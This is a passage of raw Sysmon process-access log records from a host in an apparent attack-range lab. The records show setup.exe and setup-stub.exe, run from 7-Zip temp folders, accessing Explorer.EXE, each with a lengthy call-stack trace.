ll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000014970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000014969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000014967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000014964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000014961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 